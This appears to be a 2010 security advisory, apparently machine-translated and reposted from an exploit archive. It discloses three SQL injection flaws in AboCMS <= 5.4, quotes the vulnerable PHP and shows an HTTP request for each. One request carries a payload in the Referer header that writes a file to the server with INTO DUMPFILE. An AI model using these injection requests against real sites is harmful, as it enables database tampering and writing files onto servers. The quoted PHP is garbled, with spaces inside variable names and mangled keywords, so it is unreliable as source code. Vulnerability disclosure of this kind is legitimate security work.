AboCMS <= 5.4 remote SQL Injection Vulnerabilities
Posted on 19 March 2010
================================================== AboCMS <= 5.4 remote SQL Injection Vulnerabilities ================================================== Author: Vladimir Vorontsov OnSec Russian Security Group In the popular content management system AboCMS version 5.2 found a critical vulnerability. Errors allow an attacker to modify the query syntax to the database. It exists because of the lack of data filtering of HTTP headers and data in the request variables. 1. Vulnerability in the header data HTTP Referer. Exploitation of vulnerability is possible when the option rewrite_mod settings management system. Vulnerable code: $ url_info = parse_url ($ _SERVER [ 'HTTP_REFERER']); if ($ CONFIG [ 'rewrite_mod']) ( $ link = @ $ url_info [ 'path']? preg_replace ( "/ ^ / (rus | ukr | blr | de | frn | eng) /? / i", "", $ url_info [ 'path']): ""; / * $ amp_pos = strpos ($ link, "&"); $ link = FALSE! == $ amp_pos? substr ($ link, 0, $ amp_pos): $ link; * / if ($ link =='/') $ link = null; $ by = 'address'; ) Else ( $ link = array (); parse_str (@ $ url_info [ 'query'], $ link); $ link = (@ $ link [ 'link'] & & $ link [ 'link']!='/')? My_Sql:: escape ($ link [ 'link']):''; $ by = 'link'; ) Implementation: GET http://localhost/c.php HTTP/1.1 Referer: http://asd.asd/'/**/ INTO / ** / dumpfile /**/' C: / onsec.txt ' 2. Vulnerability in the variable data resolution request GET. Vulnerable code: if (@ $ _GET [ 'resolution']) ( $ user_resolution = $ _GET [ 'resolution']; ) Else ( $ user_resolution = 'Another'; ) Implementation: GET http://localhost/c.php?resolution = "injection / ** / to / ** / insert 3. Vulnerability in the header data HTTP Accept-Language Vulnerable code: $ user_lang = $ _SERVER [ 'HTTP_ACCEPT_LANGUAGE']; Implementation: GET http://localhost/c.php HTTP 1.1 Accept-language: "injection / ** / to / ** / insert # ~ - [ [ : Inj3ct0r : ] ]
